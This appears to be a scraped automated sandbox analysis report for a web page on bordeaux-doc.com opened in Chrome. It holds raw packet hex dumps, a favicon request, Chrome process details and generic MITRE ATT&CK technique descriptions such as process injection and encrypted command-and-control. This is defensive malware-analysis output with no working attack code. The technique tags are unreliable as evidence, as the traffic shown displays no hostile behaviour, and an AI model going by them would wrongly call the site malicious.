Jan 15, 2025 10:25:21.509546995 CET	672	IN	Data Raw: c3 72 97 61 3e 9c 5b 0a e0 00 b3 6f db 92 24 93 75 01 ec 11 a7 c5 fa 2c db a3 91 54 61 23 8c 42 f9 5b d5 00 73 19 a9 d2 11 10 3c bf 74 64 50 58 ca 74 ca fd b6 5c 00 76 37 0f 0a 24 f1 51 0b e3 19 9a 40 1b 0a 3d c3 5a 30 e7 53 2a 60 0e 43 61 4d 68 Data Ascii: ra>[o$u,Ta#B[s<tdPXt\v7$Q@=Z0S*`CaMhtF\|D+)ay51"!t_v[xc+J].H$H/Z\@Yf2b7Um$\b`W:z!^hVfQ>+`gaiUjOe
Jan 15, 2025 10:25:21.509557009 CET	1236	IN	Data Raw: d9 56 49 54 5b df e5 50 d7 5e c4 93 b7 c4 a0 85 58 ec b3 93 6a 16 a9 cf 63 72 b3 2c 75 32 ad da aa 1c 11 da cc 3c 09 97 4d 90 0e f1 1b d7 65 62 15 24 95 78 e8 8c 6c 97 99 5b ab f6 db 5e dd 07 65 87 51 42 8b 5c d2 44 ca 00 1d 63 aa 97 35 cd 9d 08 Data Ascii: VIT[P^Xjcr,u2<Meb$xl[^eQB\Dc5YJ&u{f7l}UC\vWevo1T4SQHM{aVr5E qL@0nna/xJ=z-(U@T1+^vFPUZap']{[n\untW}VV
Jan 15, 2025 10:25:21.509567976 CET	1236	IN	Data Raw: db 3c 37 1b ad f2 e4 f4 f3 80 ac b1 6a cf c8 df 2f 94 70 9f 6f e3 7e 50 42 22 e1 ac a3 e7 de 22 e2 91 96 8f f3 a4 25 83 8a ec cf e2 1b 57 03 cc 8d 63 c8 b4 e5 fc 20 0d 01 57 7a 42 65 03 4d b3 de 25 d2 dd 4f 40 c7 a4 a0 13 bc 69 5e cf b1 2e 0a 52 Data Ascii: <7j/po~PB""%Wc WzBeM%O@i^.R8:hqaZu\ha/iK` 7:sz\r`XWa9R),s37@Z5,c7)<*c!jYn4k%.sF2wz7gHF@
Jan 15, 2025 10:25:21.509579897 CET	1236	IN	Data Raw: 0b 91 3b 9a ad d9 33 a7 74 b2 5e 53 ce 54 0c 38 eb 06 e1 48 9e ad 67 da 54 4b 98 29 ca 37 38 b7 32 db ca 1c d5 46 3b 43 5f 4c 2a b8 f4 65 bb ab 6c 8f 3e ac 72 e3 23 ab 2e fe d3 0b e4 eb 5b fc 4c 76 78 46 86 5a ad 9d e0 c6 73 c6 23 00 b3 52 e7 db Data Ascii: ;3t^ST8HgTK)782F;C_L*el>r#.[LvxFZs#R9l,Pn-9\p(R9}Q[evKK11vujqWU'd>XiFW^UB3(7_I 32
Jan 15, 2025 10:25:21.509589911 CET	1236	IN	Data Raw: f9 9d a7 11 fa 12 bb 5f 84 39 20 29 6b 37 f6 83 62 95 d2 b9 27 30 36 2d f0 80 ad 0a e9 0d de 6d f9 86 d1 f9 ce 21 b4 fd 7c e7 1f 17 3f 7d a1 af 2c 31 e1 4e 9e 3f ec 05 fe f6 94 74 eb 35 bc c2 6f 06 a2 68 be 0f a7 49 cc 61 ee b3 97 87 f3 e7 cf e9 Data Ascii: _9 )k7b'06-m!\|?},1N?t5ohIau}'10040X,y$3[U<M>+^o`3zG2LvC/?Rz]>02UE{m*K^`<"h<jw
Jan 15, 2025 10:25:21.509601116 CET	1236	IN	Data Raw: 63 4e fd 4a 94 54 41 bd 6e f5 8f 3c 0d 4f 4d 35 64 b6 88 fc 21 87 29 74 99 e0 09 74 ec 15 c4 21 1b 1a 2d b1 77 e2 08 0e f7 bc 52 1a f6 d1 02 56 92 cd ab 6c 57 6e 07 57 6d 84 08 8a b4 f1 e7 04 24 5b bc 46 bb 79 7c 43 58 70 7c 28 51 f3 d3 ed 80 2c Data Ascii: cNJTAn<OM5d!)tt!-wRVlWnWm$[Fy\|CXp\|(Q,~^<gO#_?R~x>:s8zq!-j?d~"&keI*w)Qs]Gc`6Nda2K-sU}qDBPcAa^[
Jan 15, 2025 10:25:21.509613037 CET	552	IN	Data Raw: 2d ec 9e 66 f1 12 81 2d 38 1b 68 39 12 03 5e 6e 0d 4a 83 54 ec f3 c1 44 6f 9f 18 2e a1 37 26 d6 2f c1 2f a7 12 0e 10 42 01 34 7a 0e 8f 78 04 5b 0f 3a 07 ff 00 73 59 b6 a8 ae 94 0d 5a 41 77 7d e5 02 05 b7 84 9b fe a4 c8 bc dd 98 22 61 e7 5e 17 41 Data Ascii: -f-8h9^nJTDo.7&//B4zx[:sYZAw}"a^ASajxfXoG>yn&"o6t8!Ai\?A!:`YnWkcEg~jfVnlq+P/{*D1CU$UJl/O
Jan 15, 2025 10:25:21.514404058 CET	1236	IN	Data Raw: 22 e4 20 39 80 80 b6 9f fa c5 e3 c7 a9 c2 03 47 94 e6 5d 67 71 1e 40 fa 7b 9b 77 f1 ce f1 31 14 ad 76 71 a5 f3 80 03 05 40 94 77 b9 d2 bc de 7d 60 ee b3 0e c7 c4 3e 4c a8 38 52 cd 18 07 08 66 c8 ce 3f 5c 20 de 03 30 1b 5e 2b 4d 6f 53 8c 6a fd 08 Data Ascii: " 9G]gq@{w1vq@w}`>L8Rf?\ 0^+MoSjkI7#+e4nkTF9Fs@@zx8NHcGJNW@QQ}>pYvjv8QX>)Kt%qNvPVQ>o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49752	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:21.133732080 CET	284	OUT	GET /favicon.ico HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 15, 2025 10:25:21.752506971 CET	1126	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 09:25:21 GMT Content-Type: image/vnd.microsoft.icon Content-Length: 875 Connection: keep-alive Last-Modified: Wed, 16 Nov 2005 09:54:50 GMT ETag: "36b-405abb1f4ce80" Accept-Ranges: bytes Data Raw: 47 49 46 38 39 61 10 00 10 00 f7 00 00 04 02 04 fc fe fc fc 02 04 77 00 00 08 00 64 50 00 00 15 00 2e 00 00 00 34 a8 69 00 05 00 00 15 63 c0 00 00 00 00 6f 00 00 00 00 00 00 00 00 00 7c 00 00 20 00 00 00 00 00 00 00 00 16 00 00 20 00 00 00 00 00 00 00 00 44 80 c4 00 3e a3 00 39 12 00 00 00 56 b0 00 00 a2 00 00 43 15 00 43 00 b0 03 e6 02 00 17 00 00 f5 00 00 77 00 00 66 03 00 00 00 00 00 00 00 00 04 00 a8 a2 00 19 12 00 15 00 00 00 53 00 00 21 00 00 e7 00 15 77 00 00 00 2e d0 00 ec 02 01 fd 18 00 7f 00 00 02 9c 00 00 a3 15 00 12 00 00 00 38 2e 00 a4 00 00 12 08 00 00 02 00 37 c9 e4 b6 1d a5 4b f5 12 00 77 00 66 45 05 00 00 90 00 00 f7 00 01 77 50 2e f0 a4 00 d5 12 00 f6 00 00 77 24 17 ff a4 00 ff 12 00 ff 00 00 ff 72 00 e6 72 ec 17 4e fd f5 00 7f 77 e2 2e 78 ff 00 17 ff 30 f5 ff 00 77 00 00 b2 00 a3 17 00 12 f5 00 00 77 58 00 00 b5 00 00 4b 15 00 00 00 00 d0 e6 c8 b0 17 00 12 f5 2c 00 77 01 1e 45 04 00 00 00 00 00 00 00 00 00 50 78 00 a4 13 00 12 15 00 00 00 00 24 00 10 a4 00 a6 12 15 12 00 00 00 d0 [TRUNCATED] Data Ascii: GIF89awdP.4ico\| D>9VCCwfS!w.8.7KwfEwP.w$rrNw.x0wwXK,wEPx$0w,@A9w l[wwwkwXxwwwwHP(wxl[w<Pw)wwhjd/wwpwKPsPrNld/ww4N<<Nwh0Oo5witG.zerl!,HH@\`C0:Q"E10%C$)bB =fy#6\|x;

Target ID:	0
Start time:	04:25:09
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	04:25:11
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2228,i,40194613157235526,1828511126524788873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	04:25:17
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 43

Chrome Cache Entry: 44

Chrome Cache Entry: 45

Chrome Cache Entry: 46

Chrome Cache Entry: 47

Chrome Cache Entry: 48

Chrome Cache Entry: 49

Chrome Cache Entry: 50

Chrome Cache Entry: 51

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Static File Info

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 3168, Parent PID: 5700

Windows Analysis Report
http://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htm